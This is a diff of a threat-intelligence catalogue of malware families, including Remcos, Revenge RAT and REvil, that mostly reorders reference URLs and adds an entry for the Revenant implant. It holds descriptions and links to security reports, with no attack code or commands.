+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cyber-attackers-leverage-russia-ukraine-conflict-in-multiple-spam-campaigns",
+ "https://www.trellix.com/en-us/about/newsroom/stories/research/cyberattacks-targeting-ukraine-increase.html",
+ "https://www.malwarebytes.com/blog/threat-intelligence/2022/20221121-threat-intel-report-final.pdf",
+ "https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2",
+ "https://www.youtube.com/watch?v=DIH4SvKuktM",
"https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
- "https://github.com/itaymigdal/malware-analysis-writeups/blob/main/Remcos/Remcos.md"
+ "https://www.splunk.com/en_us/blog/security/detecting-malware-script-loaders-using-remcos-threat-research-release-december-2021.html",
+ "https://myonlinesecurity.co.uk/fake-order-spoofed-from-finchers-ltd-sankyo-rubber-delivers-remcos-rat-via-ace-attachments/",
+ "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire",
+ "https://www.cybereason.com/blog/cybereason-exposes-malware-targeting-us-taxpayers",
+ "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/",
+ "https://www.zscaler.com/blogs/security-research/dbatloader-actively-distributing-malwares-targeting-european-businesses",
+ "https://www.fortinet.com/blog/threat-research/new-variant-of-remcos-rat-observed-in-the-wild.html",
+ "https://medium.com/@amgedwageh/analysis-of-an-autoit-script-that-wraps-a-remcos-rat-6b5b66075b87",
+ "https://blog.checkpoint.com/2019/06/19/sandblast-agent-phishing-germany-campaign-security-hack-ransomware/"
],
"synonyms": [
"RemcosRAT",
@@ -39052,14 +41112,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.remexi",
- "https://www.secureworks.com/research/threat-profiles/cobalt-hickman",
- "https://twitter.com/QW5kcmV3/status/1095833216605401088",
"http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf",
- "https://securelist.com/chafer-used-remexi-malware/89538/",
- "https://bitdefender.com/files/News/CaseStudies/study/332/Bitdefender-Whitepaper-Chafer-creat4491-en-EN-interactive.pdf",
"https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
+ "https://securelist.com/chafer-used-remexi-malware/89538/",
"https://symantec-blogs.broadcom.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
- "https://web.archive.org/web/20191221064439/https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets"
+ "https://twitter.com/QW5kcmV3/status/1095833216605401088",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-hickman",
+ "https://web.archive.org/web/20191221064439/https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets",
+ "https://bitdefender.com/files/News/CaseStudies/study/332/Bitdefender-Whitepaper-Chafer-creat4491-en-EN-interactive.pdf"
],
"synonyms": [
"CACHEMONEY"
@@ -39102,11 +41162,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.remsec_strider",
- "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Symantec_Remsec_IOCs.pdf",
"https://artemonsecurity.blogspot.com/2016/10/remsec-driver-analysis.html",
+ "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
+ "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Symantec_Remsec_IOCs.pdf",
"https://artemonsecurity.blogspot.com/2016/10/remsec-driver-analysis-part-3.html",
- "https://artemonsecurity.blogspot.com/2016/10/remsec-driver-analysis-part-2.html",
- "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments"
+ "https://artemonsecurity.blogspot.com/2016/10/remsec-driver-analysis-part-2.html"
],
"synonyms": [],
"type": []
@@ -39119,8 +41179,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.remy",
- "https://threatvector.cylance.com/en_us/home/report-oceanlotus-apt-group-leveraging-steganography.html",
- "https://www.secureworks.com/research/threat-profiles/tin-woodlawn"
+ "https://www.secureworks.com/research/threat-profiles/tin-woodlawn",
+ "https://threatvector.cylance.com/en_us/home/report-oceanlotus-apt-group-leveraging-steganography.html"
],
"synonyms": [
"WINDSHIELD"
@@ -39148,8 +41208,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.retadup",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/",
- "https://decoded.avast.io/janvojtesek/putting-an-end-to-retadup-a-malicious-worm-that-infected-hundreds-of-thousands/"
+ "https://decoded.avast.io/janvojtesek/putting-an-end-to-retadup-a-malicious-worm-that-infected-hundreds-of-thousands/",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/"
],
"synonyms": [],
"type": []
@@ -39162,14 +41222,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.retefe",
- "https://github.com/Tomasuh/retefe-unpacker",
- "https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/",
- "https://vulnerability.ch/2019/05/analysing-retefe-with-sysmon-and-splunk/",
- "https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/",
- "https://www.govcert.admin.ch/blog/35/reversing-retefe",
"https://github.com/cocaman/retefe",
+ "https://github.com/Tomasuh/retefe-unpacker",
"https://www.govcert.admin.ch/blog/33/the-retefe-saga",
- "https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe"
+ "https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/",
+ "https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/",
+ "https://vulnerability.ch/2019/05/analysing-retefe-with-sysmon-and-splunk/",
+ "https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe",
+ "https://www.govcert.admin.ch/blog/35/reversing-retefe"
],
"synonyms": [
"Tsukuba",
@@ -39185,10 +41245,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.retro",
- "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf",
"https://blog.360totalsecurity.com/en/analysis-cve-2018-8174-vbscript-0day-apt-actor-related-office-targeted-attack/",
- "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
- "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html"
+ "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf",
+ "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html",
+ "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/"
],
"synonyms": [],
"type": []
@@ -39196,32 +41256,45 @@
"uuid": "a4dc538e-09b7-4dba-99b0-e8b8b70dd42a",
"value": "Retro"
},
+ {
+ "description": "According to its author, Revenant is a 3rd party agent for Havoc written in C, and based on Talon. This implant is meant to expand on the Talon implant by implementing covert methods of execution, robust capabilities, and more customization.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.revenant",
+ "https://github.com/0xTriboulet/Revenant"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c95db5a7-8405-4931-868f-1a33ea7e8f6b",
+ "value": "Revenant"
+ },
{
"description": "According to Cofense, Revenge RAT is a simple and freely available Remote Access Trojan that automatically gathers system information before allowing threat actors to remotely access system components such as webcams, microphones, and various other utilities.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.revenge_rat",
- "https://blog.talosintelligence.com/2019/08/rat-ratatouille-revrat-orcus.html",
- "https://isc.sans.edu/diary/rss/22590",
- "https://github.com/itaymigdal/malware-analysis-writeups/blob/main/RevengeRAT/RevengeRAT.md",
- "https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader",
- "https://www.uptycs.com/blog/revenge-rat-targeting-users-in-south-america",
- "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries",
- "https://perception-point.io/revenge-rat-back-from-microsoft-excel-macros/",
- "https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns",
- "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
- "https://securelist.com/revengehotels/95229/",
- "https://blog.reversinglabs.com/blog/rats-in-the-library",
"https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g",
- "https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/",
- "https://www.binarydefense.com/revenge-is-a-dish-best-served-obfuscated",
- "https://yoroi.company/research/the-evolution-of-aggah-from-roma225-to-the-rg-campaign/",
- "https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/",
- "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/",
+ "https://isc.sans.edu/diary/rss/22590",
"https://blogs.360.cn/post/APT-C-44.html",
+ "https://github.com/itaymigdal/malware-analysis-writeups/blob/main/RevengeRAT/RevengeRAT.md",
+ "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries",
+ "https://www.uptycs.com/blog/revenge-rat-targeting-users-in-south-america",
+ "https://blog.reversinglabs.com/blog/rats-in-the-library",
+ "https://perception-point.io/revenge-rat-back-from-microsoft-excel-macros/",
"https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel",
+ "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
+ "https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/",
"https://blog.reversinglabs.com/blog/dotnet-loaders",
- "https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html"
+ "https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/",
+ "https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html",
+ "https://securelist.com/revengehotels/95229/",
+ "https://www.binarydefense.com/revenge-is-a-dish-best-served-obfuscated",
+ "https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns",
+ "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/",
+ "https://blog.talosintelligence.com/2019/08/rat-ratatouille-revrat-orcus.html",
+ "https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader",
+ "https://yoroi.company/research/the-evolution-of-aggah-from-roma225-to-the-rg-campaign/"
],
"synonyms": [
"Revetrat"
@@ -39236,11 +41309,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.reverse_rat",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388",
+ "https://www.seqrite.com/documents/en/white-papers/Whitepaper-OperationSideCopy.pdf",
+ "https://blog.lumen.com/reverserat-reemerges-with-a-nightfury-new-campaign-and-new-developments-same-familiar-side-actor/",
+ "https://threatmon.io/apt-sidecopy-targeting-indian-government-entities/",
"https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
"https://blog.lumen.com/suspected-pakistani-actor-compromises-indian-power-company-with-new-reverserat/",
- "https://blog.lumen.com/reverserat-reemerges-with-a-nightfury-new-campaign-and-new-developments-same-familiar-side-actor/",
- "https://www.seqrite.com/documents/en/white-papers/Whitepaper-OperationSideCopy.pdf"
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388"
],
"synonyms": [],
"type": []
@@ -39266,283 +41340,286 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.revil",
- "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/",
- "https://www.bleepingcomputer.com/news/security/revil-ransomware-devs-added-a-backdoor-to-cheat-affiliates/",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/",
- "https://medium.com/s2wlab/w4-may-en-story-of-the-week-ransomware-on-the-darkweb-5f5b8d4c3b6f",
- "https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/diving-deeper-into-the-kaseya-vsa-attack-revil-returns-and-other-hackers-are-riding-their-coattails/",
- "https://f.hubspotusercontent10.net/hubfs/7095517/FLINT-Kaseya-Another%20Massive%20Heist%20by%20REvil.pdf",
- "https://kaseya.app.box.com/s/0ysvgss7w48nxh8k1xt7fqhbcjxhas40",
- "https://securityintelligence.com/posts/sodinokibi-revil-ransomware-disrupt-trade-secrets/",
- "https://www.domaintools.com/resources/blog/revealing-revil-ransomware-with-domaintools-and-maltego",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
- "https://storage.courtlistener.com/recap/gov.uscourts.txnd.351760/gov.uscourts.txnd.351760.1.0_3.pdf",
- "https://www.nytimes.com/2019/08/22/us/ransomware-attacks-hacking.html",
- "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/",
- "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
- "https://www.youtube.com/watch?v=P8o6GItci5w",
- "https://www.bleepingcomputer.com/news/security/revil-ransomware-hits-managedcom-hosting-provider-500k-ransom/",
- "https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/",
- "https://www.huntress.com/blog/security-researchers-hunt-to-discover-origins-of-the-kaseya-vsa-mass-ransomware-incident",
- "https://intel471.com/blog/changes-in-revil-ransomware-version-2-2",
- "https://www.boll.ch/datasheets/WG_Threat_Report_EN.pdf",
- "https://www.certego.net/en/news/malware-tales-sodinokibi/",
- "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/",
- "https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/undressing-the-revil/",
- "https://securityaffairs.co/wordpress/98694/malware/sodinokibi-kenneth-cole-data-breach.html",
- "https://www.europol.europa.eu/newsroom/news/five-affiliates-to-sodinokibi/revil-unplugged",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
- "https://blog.truesec.com/2021/07/06/kaseya-vsa-zero-day-exploit",
- "https://securelist.com/sodin-ransomware/91473/",
- "https://www.flashpoint-intel.com/blog/chatter-indicates-blackmatter-as-revil-successor/",
- "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus",
- "https://medium.com/@underthebreach/tracking-down-revils-lalartu-by-utilizing-multiple-osint-methods-2bf3a6c65a80",
- "https://twitter.com/resecurity_com/status/1412662343796813827",
- "https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/",
- "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2",
- "https://www.hsgac.senate.gov/media/minority-media/new-portman-report-demonstrates-threat-ransomware-presents-to-the-united-states",
- "https://www.bleepingcomputer.com/news/security/revil-ransomware-gang-claims-over-100-million-profit-in-a-year/",
- "https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/",
- "https://cybleinc.com/2021/07/03/uncensored-interview-with-revil-sodinokibi-ransomware-operators/",
- "https://www.bleepingcomputer.com/news/security/another-ransomware-will-now-publish-victims-data-if-not-paid/",
- "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
- "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf",
- "https://ke-la.com/easy-way-in-5-ransomware-victims-had-their-pulse-secure-vpn-credentials-leaked/",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://www.elastic.co/blog/ransomware-interrupted-sodinokibi-and-the-supply-chain",
- "https://www.bleepingcomputer.com/news/security/kaseyas-universal-revil-decryption-key-leaked-on-a-hacking-forum/",
- "https://blog.amossys.fr/sodinokibi-malware-analysis.html",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2022-05-01-revil-reborn-ransom.vk.cfg.txt",
- "https://www.crowdstrike.com/blog/how-crowdstrike-stops-revil-ransomware-from-kaseya-attack/",
- "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
- "https://www.bleepingcomputer.com/news/security/revils-tor-sites-come-alive-to-redirect-to-new-ransomware-operation/",
- "https://www.cybereason.com/blog/cybereason-vs-revil-ransomware-the-kaseya-chronicles",
- "https://www.br.de/nachrichten/deutschland-welt/mutmasslicher-ransomware-millionaer-identifiziert,Sn3iHgJ",
- "https://www.cnbc.com/2021/04/23/axis-of-revil-inside-the-hacker-collective-taunting-apple.html",
- "https://www.youtube.com/watch?v=QYQQUUpU04s",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sodinokibi-ransomware-cobalt-strike-pos",
- "https://twitter.com/_alex_il_/status/1412403420217159694",
- "https://www.washingtonpost.com/national-security/ransomware-fbi-revil-decryption-key/2021/09/21/4a9417d0-f15f-11eb-a452-4da5fe48582d_story.html",
- "https://unit42.paloaltonetworks.com/revil-threat-actors/",
- "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/",
- "https://krebsonsecurity.com/2021/11/revil-ransom-arrest-6m-seizure-and-10m-reward/",
- "https://community.riskiq.com/article/3315064b",
- "https://public.intel471.com/blog/revil-ransomware-interview-russian-osint-100-million/",
- "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox",
- "https://www.trendmicro.com/en_us/research/21/h/supply-chain-attacks-from-a-managed-detection-and-response-persp.html",
- "https://www.tgsoft.it/english/news_archivio_eng.asp?id=1004",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks",
- "https://blogs.blackberry.com/en/2021/11/revil-under-the-microscope",
- "https://teamt5.org/tw/posts/revil-dll-sideloading-technique-used-by-other-hackers/",
- "https://www.justice.gov/opa/pr/ukrainian-arrested-and-charged-ransomware-attack-kaseya",
- "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-hits-new-york-airport-systems/",
- "https://therecord.media/darkside-ransomware-gang-says-it-lost-control-of-its-servers-money-a-day-after-biden-threat/",
- "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/",
- "https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html",
- "https://twitter.com/SophosLabs/status/1413616952313004040?s=20",
- "https://gist.githubusercontent.com/fwosar/a63e1249bfccb8395b961d3d780c0354/raw/312b2bbc566cbee2dac7b143dc143c1913ddb729/revil.json",
- "https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/",
- "https://areteir.com/wp-content/uploads/2020/07/Arete_Insight_Sodino-Ransomware_June-2020.pdf",
- "https://russian.rt.com/russia/article/926347-barnaulec-rozysk-fbr-kibermoshennichestvo",
- "https://www.advanced-intel.com/post/the-dark-web-of-intrigue-how-revil-used-the-underground-ecosystem-to-form-an-extortion-cartel",
- "https://www.elliptic.co/blog/revil-revealed-tracking-ransomware-negotiation-and-payment",
- "https://securelist.com/ransomware-world-in-2021/102169/",
- "https://blog.talosintelligence.com/2021/03/ctir-trends-winter-2020-21.html",
- "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89",
- "https://www.advintel.io/post/storm-in-safe-haven-takeaways-from-russian-authorities-takedown-of-revil",
- "https://home.treasury.gov/news/press-releases/jy0471",
- "https://www.documentcloud.org/documents/21505031-hgsac-staff-report-americas-data-held-hostage-032422",
- "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
- "https://www.zscaler.com/blogs/security-research/kaseya-supply-chain-ransomware-attack-technical-analysis-revil-payload",
- "https://www.connectwise.com/resources/revil-profile",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
- "https://blag.nullteilerfrei.de/2020/02/02/defeating-sodinokibi-revil-string-obfuscation-in-ghidra/",
- "https://www.flashpoint-intel.com/blog/interview-with-revil-affiliated-ransomware-contractor/",
- "https://unit42.paloaltonetworks.com/prometheus-ransomware/",
- "https://www.advanced-intel.com/post/revil-vanishes-from-underground-infrastructure-down-support-staff-adverts-silent",
- "https://news.sophos.com/en-us/2021/06/11/relentless-revil-revealed/",
- "https://analyst1.com/file-assets/History-of-REvil.pdf",
- "https://www.bleepingcomputer.com/news/security/revil-gang-tries-to-extort-apple-threatens-to-sell-stolen-blueprints/",
- "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://sites.temple.edu/care/ci-rw-attacks/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf",
- "https://www.kaseya.com/potential-attack-on-kaseya-vsa/",
- "https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/",
- "https://krebsonsecurity.com/2019/07/is-revil-the-new-gandcrab-ransomware/",
- "https://twitter.com/svch0st/status/1411537562380816384",
- "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
- "https://www.advanced-intel.com/post/from-qbot-with-revil-ransomware-initial-attack-exposure-of-jbs",
- "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-says-travelex-will-pay-one-way-or-another/",
- "https://ke-la.com/will-the-revils-story-finally-be-over/",
- "https://news.sophos.com/en-us/2021/06/30/what-to-expect-when-youve-been-hit-with-revil-ransomware/",
- "https://twitter.com/VK_Intel/status/1374571480370061312?s=20",
- "https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa",
- "https://twitter.com/SyscallE/status/1411074271875670022",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil",
- "https://f.hubspotusercontent10.net/hubfs/5943619/Whitepaper-Downloads/Ransomware_in_ICS_Environments_Whitepaper_10_12_20.pdf",
- "https://www.bleepingcomputer.com/news/security/a-look-inside-the-highly-profitable-sodinokibi-ransomware-business/",
- "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities",
- "https://www.bleepingcomputer.com/news/security/ransomware-threatens-to-reveal-companys-dirty-secrets/",
- "https://www.flashpoint-intel.com/blog/darkside-ransomware-links-to-revil-difficult-to-dismiss/",
- "https://www.netskope.com/blog/netskope-threat-coverage-revil",
- "https://medium.com/s2wlab/deep-analysis-of-revil-ransomware-written-in-korean-d1899c0e9317",
- "https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b",
- "https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom",
- "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf",
- "https://securelist.com/revil-ransomware-attack-on-msp-companies/103075/",
- "https://threatintel.blog/OPBlueRaven-Part1/",
- "https://www.appgate.com/blog/electric-company-ransomware-attack-calls-for-14-million-in-ransom",
- "https://www.flashpoint-intel.com/blog/possible-universal-revil-master-key-posted-to-xss/",
- "https://www.secureworks.com/research/lv-ransomware",
- "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://www.secureworks.com/blog/revil-development-adds-confidence-about-gold-southfield-reemergence?linkId=164334801",
- "https://www.advanced-intel.com/post/inside-revil-extortionist-machine-predictive-insights",
- "https://www.crowdstrike.com/blog/how-falcon-complete-thwarted-a-revil-ransomware-attack/",
- "https://blag.nullteilerfrei.de/2019/11/09/api-hashing-why-and-how/",
- "https://cybersecurity.att.com/blogs/labs-research/revils-new-linux-version",
- "https://www.fbi.gov/wanted/cyber/yevgyeniy-igoryevich-polyanin",
- "https://twitter.com/LloydLabs/status/1411098844209819648",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://www.bleepingcomputer.com/news/security/kaseya-obtains-universal-decryptor-for-revil-ransomware-victims/",
- "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
- "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/",
- "https://www.fincen.gov/sites/default/files/advisory/2021-11-08/FinCEN%20Ransomware%20Advisory_FINAL_508_.pdf",
- "https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/",
- "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-hits-travelex-demands-3-million/",
- "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
- "https://blog.morphisec.com/real-time-prevention-of-the-kaseya-vsa-supply-chain-revil-ransomware-attack",
- "https://www.acronis.com/en-sg/articles/sodinokibi-ransomware/",
- "https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-gang-rises-from-the-ashes-of-darkside-revil/",
- "https://tehtris.com/fr/peut-on-neutraliser-un-ransomware-lance-en-tant-que-system-sur-des-milliers-de-machines-en-meme-temps/",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/",
- "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
- "https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/",
- "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
- "https://www.elastic.co/blog/elastic-security-prevents-100-percent-of-revil-ransomware-samples?utm_content=&utm_medium=social&utm_source=twitter",
- "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
"https://www.youtube.com/watch?v=LUxOcpIRxmg",
- "https://www.zdnet.com/article/revil-ransomware-gang-launches-auction-site-to-sell-stolen-data/",
- "https://www.splunk.com/en_us/blog/security/revil-ransomware-threat-research-update-and-detections.html",
- "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/",
- "https://www.bleepingcomputer.com/news/security/revil-ransomware-shuts-down-again-after-tor-sites-were-hijacked/",
- "https://velzart.nl/blog/ransomeware/",
- "https://www.justice.gov/opa/pr/sodinokibirevil-ransomware-defendant-extradited-united-states-and-arraigned-texas",
- "https://blogs.blackberry.com/en/2021/05/threat-thursday-dr-revil-ransomware-strikes-again-employs-double-extortion-tactics",
- "https://securityintelligence.com/posts/sodinokibi-ransomware-incident-response-intelligence-together/",
- "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-crescendo/",
- "https://hatching.io/blog/ransomware-part2",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://www.zdnet.com/article/revil-ransomware-gang-acquires-kpot-malware/",
- "https://www.youtube.com/watch?v=l2P5CMH9TE0",
- "https://twitter.com/VK_Intel/status/1411066870350942213",
- "https://www.bleepingcomputer.com/news/security/revil-ransomwares-servers-mysteriously-come-back-online/",
- "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-may-tip-nasdaq-on-attacks-to-hurt-stock-prices/",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/kaseya-ransomware-supply-chain",
- "https://twitter.com/R3MRUM/status/1412064882623713283",
- "https://vimeo.com/449849549",
